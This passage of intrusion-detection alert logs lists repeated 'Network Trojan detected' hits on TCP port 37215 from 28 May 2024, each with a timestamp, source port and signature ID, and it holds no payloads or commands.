                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781175
                  SID:2829579
                  Source Port:45882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695422
                  SID:2829579
                  Source Port:35892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.801947
                  SID:2829579
                  Source Port:43758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312478
                  SID:2835222
                  Source Port:33320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495810
                  SID:2829579
                  Source Port:50814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803881
                  SID:2835222
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555536
                  SID:2829579
                  Source Port:54350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528174
                  SID:2835222
                  Source Port:54152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604429
                  SID:2835222
                  Source Port:47834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536598
                  SID:2835222
                  Source Port:49154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660986
                  SID:2835222
                  Source Port:34324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664412
                  SID:2829579
                  Source Port:32996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496383
                  SID:2829579
                  Source Port:42992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490299
                  SID:2835222
                  Source Port:51134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907944
                  SID:2829579
                  Source Port:50824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490252
                  SID:2835222
                  Source Port:54944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.787895
                  SID:2835222
                  Source Port:54574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627924
                  SID:2835222
                  Source Port:56056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767844
                  SID:2835222
                  Source Port:42838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771089
                  SID:2835222
                  Source Port:35106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785742
                  SID:2835222
                  Source Port:59070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660601
                  SID:2829579
                  Source Port:39056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916681
                  SID:2835222
                  Source Port:49020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742778
                  SID:2829579
                  Source Port:40624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781081
                  SID:2829579
                  Source Port:33268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911997
                  SID:2829579
                  Source Port:54640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907486
                  SID:2835222
                  Source Port:34014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323440
                  SID:2829579
                  Source Port:57628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770955
                  SID:2829579
                  Source Port:47182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601640
                  SID:2829579
                  Source Port:38410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696359
                  SID:2835222
                  Source Port:60362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:09.531253
                  SID:2835222
                  Source Port:34584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453482
                  SID:2829579
                  Source Port:43836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545269
                  SID:2835222
                  Source Port:48732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586038
                  SID:2835222
                  Source Port:54528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857886
                  SID:2829579
                  Source Port:47678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866500
                  SID:2835222
                  Source Port:53280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543501
                  SID:2835222
                  Source Port:56402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489874
                  SID:2835222
                  Source Port:59692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911150
                  SID:2829579
                  Source Port:35432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.514175
                  SID:2829579
                  Source Port:54294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694877
                  SID:2835222
                  Source Port:60492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719067
                  SID:2835222
                  Source Port:33344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769826
                  SID:2829579
                  Source Port:52948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927056
                  SID:2829579
                  Source Port:42436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312356
                  SID:2835222
                  Source Port:42172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798083
                  SID:2829579
                  Source Port:39584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.792905
                  SID:2835222
                  Source Port:35898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590327
                  SID:2835222
                  Source Port:59598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718864
                  SID:2829579
                  Source Port:41302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295832
                  SID:2829579
                  Source Port:35798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767708
                  SID:2829579
                  Source Port:48792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493056
                  SID:2829579
                  Source Port:42670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278039
                  SID:2829579
                  Source Port:34926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920836
                  SID:2835222
                  Source Port:41782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492364
                  SID:2835222
                  Source Port:49670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.919971
                  SID:2835222
                  Source Port:48092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577138
                  SID:2829579
                  Source Port:41686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742948
                  SID:2835222
                  Source Port:42378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766199
                  SID:2829579
                  Source Port:44534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907665
                  SID:2835222
                  Source Port:40082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489888
                  SID:2829579
                  Source Port:41186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576380
                  SID:2835222
                  Source Port:55850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279446
                  SID:2835222
                  Source Port:58066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887951
                  SID:2829579
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766209
                  SID:2829579
                  Source Port:48500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.682864
                  SID:2829579
                  Source Port:60736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536975
                  SID:2835222
                  Source Port:36586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786405
                  SID:2835222
                  Source Port:55306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911164
                  SID:2835222
                  Source Port:37330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769355
                  SID:2835222
                  Source Port:50246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906094
                  SID:2829579
                  Source Port:46002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319925
                  SID:2829579
                  Source Port:59454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660686
                  SID:2835222
                  Source Port:37238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788844
                  SID:2835222
                  Source Port:33682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887115
                  SID:2829579
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742912
                  SID:2829579
                  Source Port:40482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790206
                  SID:2829579
                  Source Port:51928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775910
                  SID:2835222
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591470
                  SID:2829579
                  Source Port:34152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628787
                  SID:2835222
                  Source Port:58362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766515
                  SID:2835222
                  Source Port:40546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788976
                  SID:2835222
                  Source Port:47686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279477
                  SID:2829579
                  Source Port:36232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657946
                  SID:2835222
                  Source Port:41292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371969
                  SID:2835222
                  Source Port:33186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888328
                  SID:2829579
                  Source Port:39080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742608
                  SID:2835222
                  Source Port:59368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494596
                  SID:2835222
                  Source Port:47532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543229
                  SID:2835222
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794612
                  SID:2835222
                  Source Port:35036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696383
                  SID:2829579
                  Source Port:46688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628120
                  SID:2829579
                  Source Port:47726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660000
                  SID:2835222
                  Source Port:48328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315429
                  SID:2835222
                  Source Port:36872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495844
                  SID:2829579
                  Source Port:48978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696405
                  SID:2835222
                  Source Port:36126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910499
                  SID:2829579
                  Source Port:36920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785701
                  SID:2829579
                  Source Port:47874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.928351
                  SID:2835222
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583266
                  SID:2835222
                  Source Port:57366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536104
                  SID:2835222
                  Source Port:55746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799476
                  SID:2835222
                  Source Port:41972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797271
                  SID:2835222
                  Source Port:48750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490418
                  SID:2835222
                  Source Port:32852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292655
                  SID:2835222
                  Source Port:59074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627956
                  SID:2829579
                  Source Port:48976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664301
                  SID:2829579
                  Source Port:46118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795262
                  SID:2835222
                  Source Port:52014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729788
                  SID:2835222
                  Source Port:46156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628950
                  SID:2835222
                  Source Port:36576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931550
                  SID:2829579
                  Source Port:38534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315762
                  SID:2835222
                  Source Port:40344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887968
                  SID:2829579
                  Source Port:54094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931602
                  SID:2835222
                  Source Port:37852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316413
                  SID:2829579
                  Source Port:42176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918110
                  SID:2835222
                  Source Port:45686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319868
                  SID:2829579
                  Source Port:59148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886676
                  SID:2829579
                  Source Port:41852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2829579
                  Source Port:57994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276793
                  SID:2829579
                  Source Port:37060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627926
                  SID:2835222
                  Source Port:44402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577129
                  SID:2835222
                  Source Port:58810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872177
                  SID:2829579
                  Source Port:51322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768542
                  SID:2829579
                  Source Port:33532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780854
                  SID:2835222
                  Source Port:55236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765345
                  SID:2829579
                  Source Port:51390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910394
                  SID:2829579
                  Source Port:41862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555536
                  SID:2835222
                  Source Port:54350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555930
                  SID:2835222
                  Source Port:51402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299062
                  SID:2835222
                  Source Port:33416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278416
                  SID:2829579
                  Source Port:49230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278415
                  SID:2835222
                  Source Port:55154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584670
                  SID:2835222
                  Source Port:32990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530516
                  SID:2829579
                  Source Port:45402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742257
                  SID:2835222
                  Source Port:49384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494426
                  SID:2829579
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483047
                  SID:2835222
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278870
                  SID:2835222
                  Source Port:55600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766103
                  SID:2835222
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719427
                  SID:2835222
                  Source Port:56470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496017
                  SID:2829579
                  Source Port:38974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766000
                  SID:2829579
                  Source Port:56814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.497187
                  SID:2829579
                  Source Port:47408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798100
                  SID:2829579
                  Source Port:33922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488909
                  SID:2835222
                  Source Port:53438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719045
                  SID:2829579
                  Source Port:47918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918874
                  SID:2829579
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673818
                  SID:2835222
                  Source Port:44816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531536
                  SID:2835222
                  Source Port:45248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604023
                  SID:2835222
                  Source Port:59198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796838
                  SID:2835222
                  Source Port:52100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577339
                  SID:2829579
                  Source Port:50102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795154
                  SID:2835222
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577820
                  SID:2829579
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.865419
                  SID:2835222
                  Source Port:46830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713749
                  SID:2829579
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279457
                  SID:2829579
                  Source Port:35038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767844
                  SID:2835222
                  Source Port:55716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888575
                  SID:2835222
                  Source Port:35980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312375
                  SID:2829579
                  Source Port:56750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.700271
                  SID:2835222
                  Source Port:57312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489409
                  SID:2829579
                  Source Port:49210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908522
                  SID:2829579
                  Source Port:56918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593946
                  SID:2829579
                  Source Port:54182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299086
                  SID:2829579
                  Source Port:50438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846726
                  SID:2835222
                  Source Port:43928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659747
                  SID:2829579
                  Source Port:45186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790731
                  SID:2835222
                  Source Port:41696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.922466
                  SID:2829579
                  Source Port:58878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845169
                  SID:2829579
                  Source Port:41724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846426
                  SID:2829579
                  Source Port:48526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885404
                  SID:2829579
                  Source Port:58536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.916796
                  SID:2829579
                  Source Port:34642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494984
                  SID:2835222
                  Source Port:37140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656247
                  SID:2835222
                  Source Port:36014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588834
                  SID:2835222
                  Source Port:54344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489420
                  SID:2829579
                  Source Port:38598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547669
                  SID:2835222
                  Source Port:34744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546769
                  SID:2829579
                  Source Port:41820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799527
                  SID:2829579
                  Source Port:40898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316589
                  SID:2829579
                  Source Port:33324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489918
                  SID:2829579
